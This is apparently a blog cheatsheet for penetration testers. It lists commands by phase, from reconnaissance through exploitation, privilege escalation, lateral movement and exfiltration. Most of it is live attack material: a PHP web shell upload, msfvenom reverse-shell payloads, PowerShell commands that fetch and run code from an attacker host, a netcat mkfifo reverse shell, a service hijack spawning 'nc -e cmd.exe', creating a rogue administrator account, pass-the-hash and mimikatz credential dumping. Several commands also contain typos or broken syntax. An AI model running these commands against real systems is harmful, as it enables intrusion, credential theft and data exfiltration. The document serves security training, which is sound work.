The Pentest Cheatsheet for Ethical Hackers

This is the pentest cheatsheet for ethical hackers. It is a living document which grows and refines over time like an aged whiskey.

Want to try out pentesting yourself? This is the workhorse virtual lab setup and configuration I use for testing.

Make your own hacking lab, see my guide Set Up A Domain Controller to Hack At Home.

Table of Contents

Setting up for reporting

My reporting tool of choice is CherryTree, mostly because KeepNote is no longer installed by default and it is known to crash. When you have done a ton of work and your work is erased by a crash that is no fun at all. The only problem is now how to get screenshots into CherryTree. The steps are simple. First thing I do is install gnome-screenshot which does not come installed by default. Do this doing an apt install gnome-screenshot. Next find Keyboard app and create a new shortcut. Give it something unique as I did. Now open CherryTree and paste the new screenshot in an open node/sub-node.

Here I have added a new shortcut key to launch gnome screenshot application, so much better!

Add New Executables to PATH

You get new tools by using a git clone github.com/repo and I usually then add the directory to my PATH by editing /root/.bashrc as the following:

# add to PATH
export PATH=$PATH:/usr/bin/dirsearch

# restart .bashrc shell settings
$ source /root/.bashrc

Phase I: Information Gathering

A favorite Nmap scan that scans all ports 1-65535 (-p-) and service version (-sV) and outputs in all formats (-oA).

nmap -sV -p- -oA nmap/this-new-scan 192.168.56.101

Nmap NSE Scripts

Locate the nmap NSE scripts to use them.

locate *.nse

Nmap Script Scan for SMB

nmap -p- -A --script=smb-vuln*

# works more oftne
nmap -p 445 --script=vuln

Nmap Script Scan for WebDAV

Run scan for WebDAV enabled devices.

nmap --script http-webdav-scan

For speedy and inclusive nmap scans try this.

$ nmap -p 1-65535 -T4 -A -v 10.0.0.1

Or the always useful combination of flags such as this one.

$ nmap -sC -sV -oA nmaps/new-nmap 10.0.0.1

Goscan

Try using GoScan.

https://github.com/marco-lancini/goscan

Bash Pingsweep

Using bash to do a ping sweep of the local subnet.

for i in `seq 1 255`; do ping -c 1 10.x.x.x.$i ; done

Telnet

Using telnet for banner grabbing.

telnet $ip

Auxiliary Metasploit Modules

Show auxiliary modules installed.

show auxiliary
use auxiliary/scanner/smb/smb_version

AutoRecon

Get AutoRecon by Tib3rius. I have spoken with the author and many others say it is the best as well.

git clone https://github.com/Tib3rius/AutoRecon
pip3 install -r ~/Autorecon/requirements.txt
echo export PATH=$PATH:~/Autorecon/src/autorecon/autorecon.py >> ~/.bashrc
exec bash
source ~/.bashrc
./autorecon.py <target>

Onetwopunch

Get onetwopunch from the Github repo.

git clone https://github.com/superkojiman/onetwopunch
cp -r onetwopunch/onetwopunch.sh /usr/bin
root@kali:~# onetwopunch.sh -t ips.txt tcp

Reconnoitre

Get Reconnoitre for automated intel gathering.

git clone https://github.com/codingo/Reconnoitre.git
python setup.py install
reconnoitre -t 192.x.x.x -o /root/targets-intel --services
 reconnoitre -t 192.x.x.x -o /root/targets-intel --services --pingsweep
 reconnoitre -t 192.x.x.x -o /root/targets-intel --pingsweep --hostnames

Netcat for Port Scanning

$ echo 10.0.0.1 > hostlist.txt
$ while read line; do nc -v -z $line 1-65535; done < hostlist.txt $ echo 1-65535 > portlist.txt
$ while read port; do nc -v -z 192.168.0.15 $port; done < portlist.txt

DNS Enumeration

Get basic DNS information.

# use nbtscan
nbtscan $ip

# use nmblookup 
nmblookup $ip

# nmap
nmap -sU -p 53 $ip-range -vv -oA dns-scan

DNS Zone Transfer

# find DNS servers
host -t ns domain | cut -d " " -f 4

# zone transfer request
host -l domain dns-server-name

Using DNSRecon and DNSEnum

# dnsrecon
dnsrecon -d domain -t axfr

# dnsenum
dnsenum domain

Web Target Enumeration

Use gobuster.

Here is an example to use for general web/Apache web technologies being present.

gobuster -w /root/SecLists-master/Discovery/Web-Content/common.txt -u http://target

And another for using against Microsoft SQL Server instances.

gobuster -w /usr/share/wordlists/dirbuster/directory-list-lowercase-1.0.txt -u http://target

Updated 11-2019

gobuster dir -u http://10.0.0.2 -w ~/seclists/Discovery/Web-Content/common.txt -v

Install gobuster.

$ cd Downloads/
$/Downloads: sudo tar -C /usr/local -xzf go1.12.7.linux-amd64.tar.gz 

# add to PATH
$ nano /root/.bashrc
export PATH=$PATH:/usr/local/go/bin
export PATH=$PATH:$(go env GOPATH)/bin
export GOPATH=$(go env GOPATH)
$ source /root/.bashrc

# get the package
$ go get github.com/OJ/gobuster

# install 
$ cd go/src/github.com/OJ/gobuster
$ go install

Or get the Debian package.

$ sudo apt-get install gobuster -y

Use gobuster to find common web files.

# use seclists common discovery list
gobuster -w seclist/Discovery/Web-Content/common.txt -u http://10.1.1.1

Use dirsearch.

git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
python3 dirsearch.py -u <URL> -e <EXTENSION> -w words

python3 dirsearch.py -u http://10.0.0.2 -e html,aspx,php

Gobuster by design does not allow a recursive option.

git clone https://github.com/epi052/recursive-gobuster
./recursive-gobuster/recursive-gobuster.pyz http://10.0.0.158

Active Directory Enumeration

Install winldapsearch. You may need some dependencies first.

sudo apt-get install libsas12-dev python-dev libldap2-dev libssl-dev
sudo pip3 install python-ldap

Whatweb

Use whatweb to enumerate the webserver running the web application.

$ whatweb 10.0.0.1

MS SQL Exploitation

Using Metasploit.

msf > use windows/mssql/mssql_payload

Here is how to connect to an MS SQL Server from Kali Linux.

sqsh -S [SQL_SERVER]

NFS Exploitation

Network File System is a unix network file sharing service.

# using rpcinfo
$ rpcinfo -p 10.0.0.1

# using nmap

# showmount will list exported folders
$ showmount -e 10.0.0.1

# display mount points
$ showmount -a 10.0.0.1

# display exported directories
$ showmount -d 10.0.0.1

# mount the share 
$ mount -t nfs 10.0.0.1:/ /mnt/tmp -o nolock

# verify new mount point
$ df -k

WordPress Exploitation

wpscan –url http://10.1.1.1/wp-login –passwords fsocity.dic -U elliot

Sometimes enumerating plugins requires aggressive detection mode.

wpscan --url http://10.10.10.88/webservices/wp/ --enumerate p,u --plugins-detection aggressive

Try enumerating users.

wpscan --url $url --enumerate u

Exploiting a wordpress site can be done by injecting a PHP shell into a PHP file in the theme, such as archive.php. The script can then be called by going to wp-content/themes/themename/script.php and having a listener open at the same time.

Enumerating Users

Using the finger service.

http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz

$ finger-user-enum.pl -t $target -U /wordlist.txt

$ finger [email protected]

Get ident-user-enum for when you detect that TCP-113 ident protocol is open.

pentestmonkey.net/tools/user-enumeration/ident-user-enum

Vulnerability Scanners

Openvas

Install and use openvas.

sudo apt-get install openvas -y
openvas-setup
openvas-start
127.0.0.1:9392

Nessus

Read the huge article I made for Nessus!

SNMP Enumeration

https://github.com/dheiland-r7/snmp

You can use snmp-check {IP} to do a manual enumeration.

Phase II: Exploitation

DNSAdmins Group Exploit

dnscmd.exe FQDN /config /serverplugindll \\kali-ip\share\myplugin.dll
sc.exe FQDN stop dns
sc.exe FQDN start dns

Freerdp

xfreerdp /u:cjosh4751 /p:iamgreat$1 /v:10.0.0.184

WebDAV Exploitation

Use cadaver.

cadaver http://10.0.0.1/webdav

Put a reverse shell on the webserver.

echo “<?php system($_REQUEST[‘cmd’]); ?>” > /tmp/shell

echo "<?php system($_REQUEST['cmd']); ?>" > /tmp/shell
put /tmp/shell.php
http://10.x.x.x/webdav/shell.php?cmd=ipconfig

File Upload Bypass Techniques

There are times where uploading a file extension is forbidden.

$ cadaver 10.0.0.1
dav:/ move my-shell.txt my-shell.php
dav:/ move my-shell.txt my-shell.asp;.txt

FTP Exploitation

See what accounts are present.

nmap --script ftp*

Use hydra to crack user accounts.

hydra -L /root/seclist/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt 10.1.1.1 ftp

SMTP Exploitation

Use smtp-user-enumeration to enumerate users on the system.

$ smtp-user-enumeration -t 10.0.0.1 -U wordlist

Use nmap scripts to enumerate users.

$ nmap --script smtp-enum-users.nse

Use Metasploit’s auxiliary smtp module.

use auxiliary/scanner/smtp/smtp_enum

SMB Exploitation

Use crackmapexec.

Basic discovery.

$ apt-get install crackmapexec
$ crackmapexec smb 10.0.0.0/24

Using credentials.

$ crackmapexec smb 10.0.0.0/24 -u admin -p password

Using Pass-the-Hash technique.

$ crackmapexec smb 10.0.0.0/24 -u admin -H ntlm hash

The point of SMB exploitation is one way finding the version of the SMB service running. For example Samba version 2.x.x

# use nbtscan
$ nbtscan $target

# use nmblookup
$ nmblookup -A 192.168.1.144
Looking up status of 192.168.1.144
 VULNSHARE02       <00> -         B <ACTIVE> 

# use smbclient L=list shares N=anonymous login
smbclient -L -N $target ip
 
# list shares
$ smbclient -L NETBIOS NAME -OR- $target ip

# connect to a share using password or NOT
$ smblient -N \\\\192.168.1.144\\\c$ PASSWORD

Use smbmap.

smbmap -H $target -u admin -p password

For brute forcing the shares’ credentials use hydra.

hydra -L users-list.txt -P /usr/share/wordlists/metasploit/unix_passwords 192.x.x.x smb

Enumerate Samba shares across the network using smbmap.

smbmap -u john316 -p password123 -H 192.x.x.x

Use smbclient to access shares with READ/WRITE

smbclient \\10.1.1.1.\sharename

Enumerate users using nmap scripts.

nmap --script smb-enum-users.nse -p 445 10.1.1.1

Brute force smb logins: using nmap.

nmap --vv -p 139,445 --script=smb-brute 10.0.2.18

Using medusa.

medusa -h 10.0.2.18 -P /usr/share/wordlists/rockyou.txt -U /root/seclist/Usernames/top-usernames-shortlist.txt -M smbnt

Compiling Exploits

If you need to compile using gcc try these:

sudo apt-get install gcc-multilib

There are many flags that can be used: For example to compile for 32 bit targets try this:

-m32 (32 bit target)
-Wl,--hash-style=both (include both gnu and sysv hashtables - Wl, passes comma separated arguments to the linker)

Additionally to cross compile:

# install mingw cross-compiler 
sudo apt-get install mingw-w64

# compile a 32-bit Windows exe
i686-w64-mingw32-gcc -o exploit.exe exploit.c

# compile a 64-bit Windows exe
x86_64-w64-mingw32-gc -o exploit.exe exploit.c

Searching In Searchsploit

Download the target.

searchsploit -m exploit-number

Print the target to screen. BE WARNED this will open in vim, so use esc + q to exit.

searchsploit -x exploit-number

Run Popular Exploits

For running exploits on targets vulnerable to EternalBlue

https://github.com/3ndG4me/AutoBlue-MS17-010
cd shellcode
sh prep.sh

Use Impacket

Setup is simple.

git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python setup.py install

python wmiexec.py admin:[email protected]

Impacket – Move Files Post Exploit

smbserver.py -comment ‘SHARE 01 Says Hi’ SHARENAME /dir-to-share

Combining smbserver.py with Windows copy is a no brainer, it is native to Windows.

Impacket – Get Compiled Version

Get the executable version of Impacket from github. All the scripts found in Impacket have been compiled for Windows and are hosted on this repository.

Web App Exploitation

If there an application running that is susceptible to SQL injection then try these.

' or '1'='1

Netcat

Put simply nectat is a *nix tool that allows the user to read and write to TCP or UDP connections. On the Kali host type the following:

root@kali:~ nectat -nv 10.x.x.x 4400

On the Windows host or in a shell via Metasploit type the following:

netcat.exe -nlvp 10.x.x.x 4400

Sending Files with Netcat

On the sending side:

nc -v $destination ip $port < file

On the receiving side:

nc -lvp $port > file

Cracking weak passwords

SecLists

Get SecLists for custom wordlists for brute forcing services.

wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip && unzip SecList.zip && rm -f SecList.zip

Use John’s builtin wordlist.

cp /usr/share/john/password.lst /root

Using ncrack.

ncrack -v 10.x.x.x:3389 -user admin -P /usr/share/wordlists/rockyou.txt

Using hashcat.

hashcat -m 1000 hashes-to-crack.txt /usr/share/wordlists/rockyou.txt

Using brutespray.

sudo apt install brutespray

# feed a recent nmap scan into spray and set service as ftp
brutespray --file top-20-ports-scan.xml --threads 20 -s ftp

Upgrading Your Shell

Try python-pty-shells.

https://github.com/infodox/python-pty-shells

Use Python if it is installed on the remote machine.

python -c 'import pty; pty.spawn("/bin/bash")

Client-Side Attack

To run an msfvenom payload for a reverse shell on the client.

root@kali:~ systemctl start postgresql
root@kali:~ msfdb init
root@kali:~ msfconsole
msf > workspace -a scenario_1
msf > workspace scenario_1
msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.x.x.x -f exe -o /var/www/reverse_shell.exe
msf > cd /var/www
msf > python -m SimpleHTTPServer 8000
msf > service apache2 start

Every local file is now hosted on that ip:port.

Then there is netcat.

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

meterpreter > shell
Process 3912 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

Not a root level user, just a regular AD user.

C:\Users\Sam\Desktop>whoami
sam-pc\sam
C:\Users\Sam\Desktop> exit

Payload Generation

Msfvenom payloads. Staged and nonstaged. Staged exploits need a multi-handler listener while unstaged exploits do not.

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=443 -f raw > shell-rev.php

UNSTAGED
msfvenom -p windows/shell_reverse_tcp -f c/python/raw LHOST LPORT
msfvenom -p windows/x64/shell_reverse_tcp -f c/python/raw LHOST LPORT

STAGED
msfvenom -p windows/shell/reverse_tcp -f c/python/raw LHOST LPORT

Special PHP shells.

https://github.com/flozz/p0wny-shell

Phase III. Privilege Escalation

Windows Privilege Escalation

The Windows equivalent of the Linux cat command is type.

type flag.txt

See the current user.

echo %USERNAME%

See all users.

net users

Get accessck.exe

wget https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk

Do a search for the Windows local user access control exploit, “bypassuac”.

msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac 
msf5 exploit(windows/local/bypassuac) > show options
msf5 exploit(windows/local/bypassuac) > set SESSION 1
SESSION => 1
msf5 exploit(windows/local/bypassuac) > run

Certutil to Move Files

certutil.exe -urlcache -split -f http://10.0.0.1/test.txt test.txt

Using cscript

cscript wget.vbs http://10.0.0.2/shell.ps1 shell.ps1

Win Priv Esc – PowerSploit

Powersploit repository

Win Priv Esc – PowerTools

Powertools repository

PowerShell

Moving Files to the Victim with PowerShell

In terms of working with tools native to Windows, PowerShell takes the cake. In other words, it’s a great way to move the attack sequence along without requiring a lot of tools on-boarding to the victim machine. Just for kicks we moved wget over to the Windows machine using nectat. PowerShell is installed by default on Windows hosts and has a pretty simple syntax for creating one-liners we need to exploit further.

meterpreter > shell
C:\Windows\System32>cmd.exe
C:\Windows\System32>powershell
C:\Windows\System32>powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://10.x.x.x:8000/reverse_shell.exe','C:\Windows\Temp\patch.exe')
powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://10..x.x.x:8000/reverse_shell.exe','C:\Windows\Temp\patch.exe')

PowerSploit

Invoke–Shellcode (used to be Invoke-Shellcode the author likes to remind people to watch what they download freely from the internet ) can be loaded into memory thus avoiding writing anything at all to disk.

C:\ Powershell -exec -c IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1")

With a PowerShell session already open on the target you can download further files.

PS c:\lowuser> IEX (New-Object Net.WebClient).downloadString('http://{kali ip addr}:8000/file.ps1')

PowerUp

Get PowerUp.ps1 onto the target or run the module in memory by using the following commands.

c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.0.0.2:80/PowerUp.ps1') ; Invoke-AllChecks"

c:\>powershell.exe -ExecutionPolicy Bypass -noLogo -Command "IEX(New-Object Net.WebClient).downloadString('http://10.0.0.2:80/powerup.ps1') ; Invoke-AllChecks"

Alternatively once you have a PS session open on the target this will work as well.

PS C:\Users\bob\> IEX(New-Object Net.WebClient).downloadString('http://10.0.0.250/PowerUp.ps1'); Invoke-AllChecks

To run powerup.ps1 when it is on the target run the following: c:>powershell.exe -exec bypass -Command “& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}”

c:\>powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

iwi -uri http://kali:80/powerview/ps1 -outfile /tmp/powerview.ps1

Try using Sherlock or JAWS.

Sherlock

git clone https://github.com/rasta-mouse/Sherlock

Get Sherlock.ps1 onto the target or run the module in memory by using the following commands.

c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.0.0.2:80/Sherlock.ps1') ; Find-AllVulns"

Or if you have a PS session already opened use it this way.

IEX(New-Object Net.WebClient).downloadString('http://10.0.0.250/Sherlock.ps1') ; Find-AllVulns

First host Sherlock.ps1 on your Kali machine and transfer it to the target. To use Sherlock call it from a PowerShell session on the target using a terminal shell. powershell -exec bypass -Command “& {Import-Module .\Sherlock.ps1; Find-AllVulns}”

powershell -exec bypass -Command "& {Import-Module .\Sherlock.ps1; Find-AllVulns}"

Yet another way to run Sherlock.

c:\> powershell -ep bypass
c:\> Import-Module .\Sherlock.ps1
c:\> Find-AllVulns

Watson

Watson is the updated version of Sherlock.

# get dependencies to compile
apt-get install -y nuget mono-devel mono-xbuild

# build the sln file
xbuild Watson.sln

# where to find compiled exe
/Watson-2.0/Watson/bin/Debug/watson.exe

To get the compiled binary to the host use wget.

PS > wget http://10.0.0.250/watson.exe -o patch.exe
PS > ./patch.exe

JAWS

https://github.com/411Hall/JAWS

Windows Exploit Suggester

To use Windows Exploit Suggester first run a command on the Windows shell to get the sysinfo command output.

C:\lowuser> systeminfo

Copy the output of this command into a text file name it sysinfo.txt and proceed.

# clone the repo
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester

# update the local db 
python windows-exploit-suggester.py --update

Now to use it to identify vulnerabilities. The –update command downloads the Microsoft security bulletin database locally.

C:\lowuser> python windows-exploit-suggester.py --systeminfo sysinfo.txt --database 2019-11-22-mssb.xls

You may need to install a dependency, to do so:

pip install xlrd

Python missing? Try Windows-exploit-suggester as a standalone binary.

root@kali: pyinstall --onefile windows-exploit-suggester.py
cp windows-exploit-suggester.exe /usr/share/windows-binaries/wes.exe

Nishang

git clone https://github.com/samratashok/nishang

PSAttack

https://github.com/jaredhaight/PSAttack

Pre compiled versions of common Windows exploits can be downloaded.

https://github.com/SecWiki/windows-kernel-exploits

Powerline

Get Powerline to target.

certutil -urlcache -split -f http://10.0.0.250/PowerLine.exe PowerLine.exe

Use Powerline to get a reverse shell.

PowerLine.exe Invoke-PowerShellTcp "Invoke-PowerShellTcp -Reverse -IPAddress 10.0.0.250 -Port 4444"

Powerview

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

Internal Monologue

C:\>powershell.exe -nop "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/eladshamir/Internal-Monologue/master/Invoke-InternalMonologue.ps1');"

CVE-2019-1322 Windows 10 UsoSvc Exploit

PS C:\spongebob> sc.exe stop UsoSvc
PS C:\spongebob> sc.exe config usosvc binPath="C:\Users\writeable\nc.exe 10.0.0.1 6666 -e cmd.exe"
PS C:\spongebob> sc.exe start UsoSvc

Linux privilege escalation

Get linpeas

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

Get a script to suggest exploits.

https//www.securitysift.com/download/linuxprivchecker.py

Get linux-smart-enumeration tool.

https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh

Get linenum tool.

https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

Get Roothelper.

https://github.com/NullArray/RootHelper

Find binaries with the SUID and GUID bits set. This will allow a normal user to run them with the privileges of the file’s original owner.

find / -user root -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Where SUID + GUID both set
find . -perm /6000

Use automated tools whenever possible. Make sure you try out linuxprivchecker.py

git clone https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py

Make current user root. If you are able to write to /etc/passwd and you have the password for the current user you can elevate the user to root.

# change the uid and guid to 0 for root
bobby:x:0:0::/home/bobby:/bin/sh

List Out Files Properly

This is the best way to do it.

find /home -printf "%f\t%p\t%u\t%g\t%m\t%n\n" 2=/dev/null | column -t

Use linux priv checker

git clone https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py
chmod 700 linuxprivchecker.py
python linuxprivchecker.py

Reverse Shell One Liners

#pentestmonkey one liner - if nc -e is an invalid option credit jeff price
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.100 4444 >/tmp/f

Cracking Passwords

How to crack found SSH RSA keys

Use ssh2john and then john to crack it.

git clone https://raw.githubusercontent.com/koboi137/john/bionic/ssh2john.py
ssh2john key > crackme.txt
john --wordlist=/usr/share/yourwords crackme.txt

Persistence

Using the net command add a new user. Next using the same command add the newly created user to the local administrators group.

meterpreter > sessions 2
meterpreter > shell
C:\Windows\System32>C:\Windows\System32>net user /add evil password            
net user /add evil password
The command completed successfully.
C:\Windows\System32>net localgroup administrators evil /add
net localgroup administrators evil /add
The command completed successfully.

Phase IV: Moving Laterally

Pass-the-Hash

pth-winexe -U domain.locall/Administrator%HASH(NT/NTLM) //hostname.local cmd.exe

Meterpreter Shell

load kiwi
creds_all

load mimikatz
mimikatz_command -f samdump::hashes

Psexec

psexec \\$ip cmd.exe

Have Creds?

Use psexec from Impacket and open a new shell as another user.

python psexec.py testlab.local/Administrator:[email protected] cmd

CredNinja

Your output may look different, because I added a line in the Python script to print the command.

root@kali:~ python3 CredNinja.py -a accounts.txt -s servers.txt --valid
['smbclient', '-U', 'ethicalhackingguru\\\\Administrator', '\\\\10.x.x.x\\c$', 'Password123!', '-c', 'dir', '-m', 'SMB3']
10.x.x.x                          ethicalhackingguru\\Administrator Password123!                        LOCAL ADMIN! Valid

Runas

Using runas. Means running locally but authenticating as another user over the network.

C:\Users\skippy\runas /netonly /user:ethicalhackingguru\administrator cmd.exe

and a new terminal is now open running as administrator, reading cmd.exe (running as ethicalhackingguru\administrator).

SSH

Connecting to the target with the found passphrase and an RSA private key can be useful.

ssh -i rsa.key [email protected]

Phase V: Exfilitration

DNSteal

root@kali: git clone https://github.com/m57/dnsteal

python dnsteal.py 127.0.0.1 -z -s 4 -b 57 -f 17

DNSteal enables a DNS server listening for incoming DNS requests. By binding networking socket to port 53 the tool takes these requests and facilitates moving data. The commands are displayed that are used to leverage the server, notice how they are regular DNS *nix commands. In other words, dig is used to exfiltrate files and folders.

Here I am pasting in the commands to be run by DNSteal.py

The schematics are in my inbox now bwuaha!

Check Existing Guides

https://malikashish8.github.io/Walkthrough/notes/
https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70